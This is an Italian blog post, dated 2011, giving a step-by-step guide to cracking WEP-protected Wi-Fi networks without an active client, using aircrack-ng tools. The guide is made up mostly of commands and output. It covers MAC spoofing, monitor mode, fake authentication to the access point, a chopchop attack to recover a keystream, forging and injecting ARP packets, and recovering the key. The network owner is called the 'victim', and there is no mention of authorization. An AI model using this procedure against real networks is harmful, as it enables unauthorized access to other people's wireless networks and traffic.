mercoledì 9 marzo 2011

(Guida) WEP crack senza client attivi

Chi di voi usa aircrack-ng, sa che per entrare in una rete wi-fi bisogna che il client sia attivo, ovvero che la "vittima" sia collegata dal suo modem.
Oggi vi presenterò una guida per linux in cui si spiega come fare a craccare una WEP senza client attivo.

Innanzitutto cambiamo il nostro MAC:
Codice:
ifconfig <interfaccia> down
ifconfig <interfaccia> hw ether <nuovo MAC>
ifconfig <interfaccia> up
Impostiamo la nostra scheda di rete in monitor mode:
Codice:
airmon-ng start <interfaccia>
Facciamo partire lo sniffer per catturare i pacchetti:
Codice:
airodump-ng -c <canale> --bssid <Access Point MAC> -w <file> <interfaccia>
Injection test con -9:
Codice:
aireplay-ng -9 <interfaccia>
controlliamo se funziona l'injection, se la % è troppo bassa regoliamo il rate con:
Codice:
iwconfig <interfaccia> rate 1M
prima di settare 1M tentate qualche valore intermedio tipo 11M, perchè anche se con 1M aumenta l'accuratezza, diminuisce la velocità d'injection

Ci autentichiamo all'Access Point:

Codice:
aireplay-ng -1 0 -q 20 -e <Access Point ESSID> -a <Access Point MAC> -h <nostro MAC> <interfaccia>

-1 indica la fake authentication
-q indica di mandare pacchetti ogni tot secondi per mantenere la connessione attiva

Il sistema risponderà:
    18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful Smile

connessione stabilita

Codice:
aireplay-ng -4 -h <nostro MAC> -b <Access Point MAC> <interfaccia>
-4 indica il Korek Chopchop Attack
Il sistema risponderà:
    Waiting for a data packet... Read 127 packets... Size: 114, FromDS: 1, ToDS: 0 (WEP) BSSID = XX:XX:XX:XX:XX:XX Dest. MAC = XX:XX:XX:XX:XX:XX Source MAC = XX:XX:XX:XX:XX:XX 0x0000: 0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B....^.....l~@. 0x0010: 0040 f477 e5c9 6052 8c00 0000 3073 d265 .@.w..`R....0s.e 0x0020: c402 790b 2293 c7d5 89c5 4136 7283 29df ..y.".....A6r.). 0x0030: 4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b N.^._CO..7?.M..; 0x0040: 8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5 .DX...z.+.>...O. 0x0050: 4563 906d 0d90 88c4 5532 a602 a8ea f8e2 Ec.m....U2...... 0x0060: c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1 .1..+(...."m.qj. 0x0070: 9c9f .. Use this packet ? y

Premiamo "y" per dare conferma

Il sistema risponderà:
    Offset 48 (71% done) | xor = 34 | pt = E5 | 48 frames written in 142ms Offset 47 (73% done) | xor = 34 | pt = 77 | 64 frames written in 192ms Offset 46 (75% done) | xor = 51 | pt = F4 | 253 frames written in 759ms Offset 45 (76% done) | xor = 98 | pt = 40 | 109 frames written in 327ms Offset 44 (78% done) | xor = 3D | pt = 00 | 242 frames written in 726ms Offset 43 (80% done) | xor = 5E | pt = 01 | 194 frames written in 583ms Offset 42 (82% done) | xor = AF | pt = 00 | 99 frames written in 296ms Offset 41 (84% done) | xor = C4 | pt = 04 | 164 frames written in 492ms Offset 40 (86% done) | xor = CE | pt = 06 | 69 frames written in 207ms Offset 39 (88% done) | xor = 9D | pt = 00 | 137 frames written in 411ms Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms Saving keystream in replay_dec-xxxx-xxxxxx.xor

copiamo il nome replay_dec-xxxx-xxxxxx.xor e lo incolliamo nel passo successivo per creare il pacchetto con packetforge

Codice:
packetforge-ng -0 -a <Access Point MAC> -h <nostro MAC> -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-xxxx-xxxxxx.xor -w arp-request
-0 vuol dire che stiamo creando un pacchetto arp
-l indica l'IP sorgente - lasciamo 255.255.255.255
-k indica l'IP destinazione - lasciamo 255.255.255.255

Il sistema risponderà:

    Wrote packet to: arp-request

iniettiamo i pacchetti

Codice:
aireplay-ng -2 -r arp-request <interfaccia>
Il sistema risponderà:
    size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = XX:XX:XX:XX:XX:XX Dest. MAC = XX:XX:XX:XX:XX:XX Source MAC = XX:XX:XX:XX:XX:XX 0x0000: 0841 0201 0014 6c7e 4080 0009 5bec eef2 .A....l~@...[... 0x0010: ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............z... 0x0020: c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ...........q.Z8. 0x0030: f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ....U..>.......^ 0x0040: 6ada 92f2 j... Use this packet ? y

Premiamo "y" per dare conferma

Controlliamo che su airodump che i #data arrivino a circa 50.000 e lanciamo aircrack:

Codice:
aircrack-ng -z -b <Access Point MAC> <file*.cap>

Nessun commento:

Posta un commento